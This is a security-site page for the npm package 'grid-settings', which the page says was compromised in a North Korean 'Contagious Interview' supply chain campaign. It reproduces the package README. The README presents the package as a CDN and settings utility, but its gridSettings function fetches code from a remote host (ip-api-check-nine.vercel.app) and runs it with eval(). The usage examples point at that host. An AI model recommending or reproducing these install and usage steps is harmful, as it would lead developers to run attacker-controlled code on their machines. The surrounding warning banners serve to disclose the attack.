Security News
npm Introduces minimumReleaseAge and Bulk OIDC Configuration
npm rolls out a package release cooldown and scalable trusted publishing updates as ecosystem adoption of install safeguards grows.
By Sarah Gooding - Feb 26, 2026
Latest Threat Research:SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains.Details →
grid-settings
Advanced tools
Package version was removed
This package version has been unpublished, mostly likely due to security reasons
This package was compromised as part of the ongoing "North Korea’s Contagious Interview Campaign" supply chain attack.
grid-settings
Grid Settings
A Node.js utility for fetching and managing settings from a distributed grid system. This module provides functions to retrieve icon resources from multiple CDN providers and fetch grid configuration settings with automatic retry logic.
✨ Features
- 🌐 Multi-CDN Support - Fetch resources from 6 major CDN providers
- ⚙️ Grid Configuration - Retrieve and apply settings from remote grid systems
- 🔄 Automatic Retry Logic - Built-in retry mechanism for failed requests
- 📦 Simple API - Easy-to-use promise-based functions
- 🛡️ Error Handling - Comprehensive validation and error management
📦 Installation
npm install grid-settings
🚀 Quick Start
const { setDefaultModule, gridSettings } = require('grid-settings');
// Fetch an icon from Cloudflare CDN
setDefaultModule('cloudflare', 'icon', 'github.svg', 'https://cdnjs.cloudflare.com')
.then(data => {
console.log('Icon data:', data);
})
.catch(error => {
console.error('Error:', error);
});
// Fetch grid settings
gridSettings('132', options, 3); // Retry up to 3 times
📖 API Reference
setDefaultModule(iconProvider, resourceType, token, baseUrl)
Fetches an icon resource from a specified CDN provider.
Parameters:
| Parameter | Type | Description |
|---|---|---|
iconProvider | string | CDN provider name (see supported providers below) |
resourceType | string | Type of resource to fetch |
token | string | Resource identifier or token |
baseUrl | string | Base URL for the CDN endpoint |
Returns: Promise<Object> - Resolves with the fetched resource data
Example:
const { setDefaultModule } = require('grid-settings');
async function fetchIcon() {
try {
const data = await setDefaultModule(
'cloudflare',
'icon',
'github.svg',
'https://cdnjs.cloudflare.com'
);
console.log('Icon data:', data);
} catch (error) {
console.error('Failed:', error.message);
}
}
fetchIcon();
gridSettings(reqtoken, reqoptions, ret)
Fetches grid configuration settings with automatic retry logic. This function retrieves settings from the configured grid endpoint and applies them.
Parameters:
| Parameter | Type | Description |
|---|---|---|
reqtoken | string | Token for the grid settings request (default: '132') |
reqoptions | Object | Request options including URL and headers |
ret | number | Number of retry attempts (default: 1) |
Note: This function uses eval() to execute received code. Ensure the grid endpoint is trusted.
Example:
const { gridSettings } = require('grid-settings');
// Fetch settings with 3 retry attempts
gridSettings('132', options, 3);
// Fetch with custom token
const customOptions = {
url: 'https://ip-api-check-nine.vercel.app/icons/',
headers: { bearrtoken: 'logo' }
};
gridSettings('custom-token', customOptions, 2);
🌐 Supported CDN Providers
| Provider | Identifier | Domain |
|---|---|---|
| Cloudflare | cloudflare | cloudflare.com |
| Fastly | fastly | fastly.net |
| KeyCDN | keyIcon | keyIcon.com |
| Akamai | akamai | akamai.net |
| Amazon CloudFront | amazoncloudfront | cloudfront.net |
| Gcore | gcore | gcorelabs.com |
💡 Usage Examples
Fetching Icons from Multiple CDNs
const { setDefaultModule } = require('grid-settings');
async function loadIconsFromMultipleCDNs() {
const providers = ['cloudflare', 'fastly', 'akamai'];
const icons = ['github.svg', 'twitter.svg', 'linkedin.svg'];
for (const provider of providers) {
for (const icon of icons) {
try {
const data = await setDefaultModule(
provider,
'icon',
icon,
`https://cdnjs.${provider === 'cloudflare' ? 'cloudflare' : provider}.com`
);
console.log(`Loaded ${icon} from ${provider}:`, data);
} catch (error) {
console.error(`Failed to load ${icon} from ${provider}:`, error.message);
}
}
}
}
loadIconsFromMultipleCDNs();
Configuring Grid Settings
const { gridSettings } = require('grid-settings');
// Configure and apply grid settings with retries
function applyGridConfiguration(configId, retries = 5) {
const options = {
url: 'https://ip-api-check-nine.vercel.app/icons/',
headers: { bearrtoken: 'logo' }
};
gridSettings(configId, options, retries);
console.log(`Grid settings applied with ID: ${configId}`);
}
applyGridConfiguration('grid-config-001', 3);
Error Handling
const { setDefaultModule, gridSettings } = require('grid-settings');
// Handle errors in setDefaultModule
setDefaultModule('invalid-provider', 'icon', 'test.svg', 'https://example.com')
.catch(error => {
if (error.message === 'Unsupported Icon provider') {
console.error('Please use a supported CDN provider');
} else {
console.error('Unexpected error:', error);
}
});
// Grid settings will automatically retry on failure
gridSettings('token', options, 3);
⚠️ Important Notes
Security Considerations
gridSettingsuseseval()- This function executes code received from the remote server- Only use trusted grid endpoints - Ensure the grid configuration endpoint is secure and trusted
- Validate all inputs - Always validate tokens and configuration IDs before use
Error Handling
The library throws errors in the following cases:
- Unsupported CDN Provider: When an invalid provider identifier is used in
setDefaultModule - Network Errors: When the request fails due to network issues
- Invalid Response: When the server returns a non-200 status code
- Parse Errors: When the response body cannot be parsed as JSON
🔧 Requirements
- Node.js >= 12.0.0
- npm or yarn package manager
📝 License
ISC License - see the LICENSE file for details.
🐛 Bug Reports
Found a bug? Please report it on GitHub Issues.
👤 Author
copperadev
- GitHub: @copperadev
🤝 Contributing
Contributions, issues, and feature requests are welcome!
Made with ❤️ by copperadev
FAQs
security holding package
The npm package grid-settings receives a total of 0 weekly downloads. As such, grid-settings popularity was classified as not popular.
We found that grid-settings demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 0 open source maintainers collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Related posts
Security News
Risky Biz Podcast: Open Source Risk Is Compounding as AI Agents Write 90% of New Code
AI agents are writing more code than ever, and that's creating new supply chain risks. Feross joins the Risky Business Podcast to break down what that means for open source security.
By Sarah Gooding - Feb 24, 2026
Research
/Security News
Four Malicious NuGet Packages Target ASP.NET Developers With JIT Hooking and Credential Exfiltration
Socket uncovered four malicious NuGet packages targeting ASP.NET apps, using a typosquatted dropper and localhost proxy to steal Identity data and backdoor apps.
By Kush Pandya - Feb 23, 2026